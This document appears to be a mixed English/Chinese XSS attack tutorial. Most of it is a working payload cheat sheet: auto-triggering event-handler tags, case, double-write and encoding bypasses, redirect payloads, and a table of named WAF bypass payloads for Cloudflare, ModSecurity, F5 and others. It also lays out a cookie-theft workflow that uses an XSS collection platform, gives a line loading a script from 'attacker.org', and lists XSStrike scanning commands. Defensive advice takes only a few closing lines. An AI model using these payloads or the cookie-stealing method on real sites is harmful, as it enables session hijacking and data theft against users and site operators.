XSS vulnerability (cross-site scripting)
1. Introduction to XSS vulnerabilities
XSS, also known as CSS (Cross Site Script) cross-site scripting attack, refers to a malicious attacker inserting malicious Script code into a Web page. When a user browses the page, the Script code embedded in the Web will be executed, thereby achieving malicious intent. The purpose of attacking users.
XSS vulnerabilities usually output JavaScript code to HTML pages through the output function of PHP and execute it through the user's local browser. Therefore, the key to XSS vulnerabilities is to find output functions with unfiltered parameters.
Common output functions are: echo printf print print_r sprintf die var-dump var_export.
2.Principles of XSS
- Attackers launch XSS attacks (inject JS code) on vulnerable servers.
- Tricks the victim into opening a compromised server URL.
- The victim opens the URL in a web browser and the malicious script is executed.
3.XSS attack methods
- Reflected XSS:<Non-persistent> The attacker has made the attack link in advance, and needs to trick the user into clicking the link to trigger the XSS code (there is no such link in the server) Pages and content), generally appear easily on search pages. Usually it is processed by the back-end code
- Stored XSS:<Persistence> The code is stored in the server database, such as adding code to personal information or published articles. If there is no filtering or If the filtering is not strict, then these codes will be stored in the server, and code execution will be triggered every time a user visits the page. This kind of XSS is very dangerous and can easily cause worms and a large number of cookie thefts (although there is also a DOM type XSS, but It is still included in stored XSS).
- DOM type XSS: A vulnerability based on the Document Object Model (Document Objeet Model, DOM). DOM is an interface that is independent of platform and programming language. It allows programs or scripts to dynamically access and update document content, structure and style, and the processed results can become part of the displayed page. There are many objects in the DOM, some of which can be manipulated by users, such as uRI, location, refelTer, etc. The client's script program can dynamically check and modify the page content through the DOM. It does not rely on submitting data to the server, but obtains the data in the DOM from the client and executes it locally. If the data in the DOM is not strictly confirmed, it will Generates DOM XSS vulnerabilities. Usually the browser front-end code handles it.
4. Dangers of XSS
1.挂马
2.盗取用户Cookie。
3.DOS(拒绝服务)客户端浏览器。
4.钓鱼攻击,高级的钓鱼技巧。
5.删除目标文章、恶意篡改数据、嫁祸。
6.劫持用户Web行为,甚至进一步渗透内网。
7.爆发Web2.0蠕虫。
8.蠕虫式的DDoS攻击。
9.蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
10.其它安全问题
5. How to use XSS
- Need an xss platform to collect cookies
2. For reflective xss constructable links, when the user clicks, the user cookie is sent to the xss platform
3. Steal the user’s cookie and then use it
Can be exploited based on xss platform
xss platform use
https://xss8.cc/bdstatic.com/?callback=project&act=create
6. Common XSS attack methods
Some commonly used tags and attributes
Most of the tags I listed below can automatically trigger js code without user interaction. In most cases, we also hope to trigger automatically instead of waiting for the user to trigger.
1.scirpt tag
<script> 标签用于定义客户端脚本,比如 JavaScript。
<script>alert(1);</script>
<script>alert("xss");</script>
2.img tag
<img> 标签定义 HTML 页面中的图像。
<img src=1 onerror=alert(1);>
<img src=1 onerror=alert("xss");>
3.input tag
<input> 标签规定了用户可以在其中输入数据的输入字段。
onfocus 事件在对象获得焦点时发生:
<input onfocus=alert(1);>
Compete for focus, thus triggering the onblur event:
<input onblur=alert(1) autofocus><input autofocus>
The autofocus attribute of the input tag specifies that the element should automatically gain focus when the page loads. You can automatically execute your own focus event through the autofocus attribute. This vector causes the focus to automatically jump to the input element and trigger the focus event without the user having to trigger it:
<input onfocus="alert(1);" autofocus>
" οnclick=alert(1)> 这样需要点击一下输入框<br>
" onmouseover=alert(1)> 需要鼠标划过输入框<br>
4. details tag
<details> 标签通过提供用户开启关闭的交互式控件,规定了用户可见的或者隐藏的需求的补充细节。ontoggle 事件规定了在用户打开或关闭 <details> 元素时触发:
<details ontoggle=alert(1);>
Use the open attribute of the details tag to trigger the ontoggle event, which can be triggered without the user having to click:
<details open ontoggle=alert(1);>
5.svg tag
<svg> 标签用来在HTML页面中直接嵌入SVG 文件的代码。
<svg onload=alert(1);>
6.select tag
<select> 标签用来创建下拉列表。
<select onfocus=alert(1)></select
通过autofocus属性规定当页面加载时元素应该自动获得焦点,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发:
<select onfocus=alert(1) autofocus>
7.iframe tag
<iframe> 标签会创建包含另外一个文档的内联框架。
<iframe onload=alert(1);></iframe>
8.video tag
<video> 标签定义视频,比如电影片段或其他视频流。
<video><source onerror=alert(1)>
9.audio tag
<audio> 标签定义声音,比如音乐或其他音频流。
<audio src=x onerror=alert(1);>
10.body tag
<body> 标签定义文档的主体。
<body onload=alert(1);>
The onscroll event is fired when the element's scrollbar is scrolling. We can use line breaks and autofocus to automatically trigger when the user slides the scroll bar, without the user having to click to trigger:
<body
onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
11.textarea tag
<textarea> 标签定义一个多行的文本输入控件。
<textarea onfocus=alert(1); autofocus>
12.keygen tag
<keygen autofocus onfocus=alert(1)> //仅限火狐
13.marquee tag
<marquee onstart=alert(1)></marquee> //Chrome不行,火狐和IE都可以
14.isindex tag
<isindex type=image src=1 onerror=alert(1)>//仅限于IE
7. Common basic filtering methods
1. Space filtering
When spaces are filtered, we can use / to replace spaces:
/**/,注释符号绕过;/符号绕过;
<img/src="x"/onerror=alert(1);>
也可以:
<img/src="x"onerror=alert(1);>
2. Quote filtering
如果是html标签中,我们可以不用引号。如果是在js中,我们可以用反引号代替单双引号:
<img src=x onerror=alert(`xss`);>
3. Bracket filtering
When brackets are filtered, you can use throw to bypass them. The throw statement is used to throw an error when an error occurs.
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<a onmouseover="javascript:window.onerror=alert;throw 1>
4. Keyword filtering
Case bypassing
<sCRiPt>alert(1);</sCrIpT>
<ImG sRc=x onerRor=alert(1);>
Double write bypass
Some wafs may only be replaced once and replaced with nothing. In this case, we can consider double-writing keywords to bypass
<scrscriptipt>alert(1);</scrscriptipt>
<imimgg srsrcc=x onerror=alert(1);>
5. String concatenation bypass
Using the eval() function
Like PHP's eval() function, JavaScript's eval() function can also calculate JavaScript strings and execute them as script code.
<img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)">
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
// 在js中,我们可以用反引号代替单双引号
6. Encoding bypass
Unicode编码绕过
<img src="x" onerror="alert("xss");">
javascript:alert(/xss/) (编码了r和i)
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
url编码绕过
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Ascii码绕过
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
hex绕过
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
base64绕过
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
7. Filter url addresses
使用url编码
<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
javascript:alert('xsshttp://')
使用IP
1.十进制IP
<img src="x" onerror=document.location=`http://2130706433/`>
2.八进制IP
<img src="x" onerror=document.location=`http://0177.0.0.01/`>
3.hex
<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>
4.html标签中用//可以代替http://
<img src="x" onerror=document.location=`//www.baidu.com`>
5.使用\\
但是要注意在windows下\本身就有特殊用途,是一个path 的写法,所以\\在Windows下是file协议,在linux下才会是当前域的协议
6.使用中文逗号代替英文逗号
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号
<img src="x" onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度
8. Single quote closure + htmlspecialchars function bypass
'onmouseover='alert(/xss/)
9.JavaScript pseudo-protocol
"><a href=javascript:alert(/xss/)> o_n和<scr_ipt>过滤
8.HttpOnly bypass
1.What is HttpOnly?
If you set the HttpOnly attribute in the cookie, the cookie information will not be read through the js script, which can effectively prevent XSS attacks. For more specific introduction, please search on Google
2.Is the API supported by javaEE?
At present, Sun has not announced the relevant API, but PHP and C# have implemented it. Brothers who are engaged in javaEE are quite depressed. Don’t worry, there are workarounds below.
3.HttpOnly setting example
javaEE
response.setHeader(“Set-Cookie”, “cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly”);
The meaning of the specific parameters will not be explained again. After the setting is completed, the cookie cannot be read through the js script, but it can be read using the following method
Cookie cookies[]=request .getCookies();
C#
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);
VB.NET
Dim myCookie As HttpCookie = new HttpCookie("myCookie")
myCookie.HttpOnly = True
Response.AppendCookie(myCookie)
But in .NET 1.1, you need to add it manually
Response.Cookies[cookie].Path += “;HTTPOnly”;
PHP4
header("Set-Cookie: hidden=value; httpOnly");
PHP5
setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);
The last parameter is the HttpOnly attribute
9. Conventional waf bypass ideas
1. Tag syntax replacement
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<script>alert("XSS")</script>
<script src="http://attacker.org/malicious.js"></script>
2. Special symbol interference
3. Change of submission method
4. Garbage data overflow
5. Encryption and decryption algorithm
6. Combine with other vulnerabilities to bypass
The following list contains bypassable WAFs, Payloads, and related bypass techniques.
WAF名称:Cloudflare
Payload:<a”/onclick=(confirm)()>click
绕过技术:非空格填充
WAF名称:Wordfence
Payload:<a/href=javascript:alert()>click
绕过技术:数字字符编码
WAF名称:Barracuda
Payload:<a/href=Java%0a%0d%09script:alert()>click
绕过技术:数字字符编码
WAF名称:Comodo
Payload:<d3v/onauxclick=(((confirm)))“>click
绕过技术:黑名单中缺少事件处理器以及函数调用混淆
WAF名称:F5
Payload:<d3v/onmouseleave=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理器以及函数调用混淆
WAF名称:ModSecurity
Payload:<details/open/ontoggle=alert()>
绕过技术:黑名单中缺少标签或事件处理器
WAF名称:dotdefender
Payload:<details/open/ontoggle=(confirm)()//
绕过技术:黑名单中缺少结束标签、事件处理器和函数调用混淆
10.Usage of XSStrike tool
1. Test a web page using the GET method:
python xsstrike.py -u "http://example.com/search.php?q=query"
2. Test POST data:
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
3. Test URL path:
python xsstrike.py -u "http://example.com/search/form/query" --path
4. Start searching for the target from the target page and test it
python xsstrike.py -u "http://example.com/page.php" --crawl
You can specify the depth of the crawl, default 2: -l
python xsstrike.py -u "http://example.com/page.php" --crawl -l 3
5. If you want to test URLs in a file, or just want to add seeds for crawling, you can use the --seeds option:
python xsstrike.py --seeds urls.txt
6. Find hidden parameters:
Find hidden parameters by parsing HTML and brute force
python xsstrike.py -u "http://example.com/page.php" --params
7. Blind XSS: Use this parameter during crawling to insert xss code into each variable in each html form.
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
8. Fuzz testing – fuzzer
This fuzzer is designed to test filters and web application firewalls, and the delay can be set to 1 second using the -d option.
python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer
9. Skip DOM scanning
DOM XSS scanning can be skipped when crawling to save time
python xsstrike.py -u "http://example.com/search.php?q=query" --skip-dom
10. Update:
If followed with the --updata option, XSStrike will check for updates. If a newer version is available, XSStrike will download the update and merge it into the current directory without overwriting other files.
python xsstrike.py --update
11.XSS defense measures
(1) Encoding: HTML Entity encoding of data entered by the user
(2) Filtering: Remove DOM attributes uploaded by users, such as onerror, etc., and remove style nodes, script nodes, iframe nodes, etc. uploaded by users.
(3) Correction: Avoid encoding HTML Entity directly, use DOM Prase conversion, and correct unmatched DOM tags.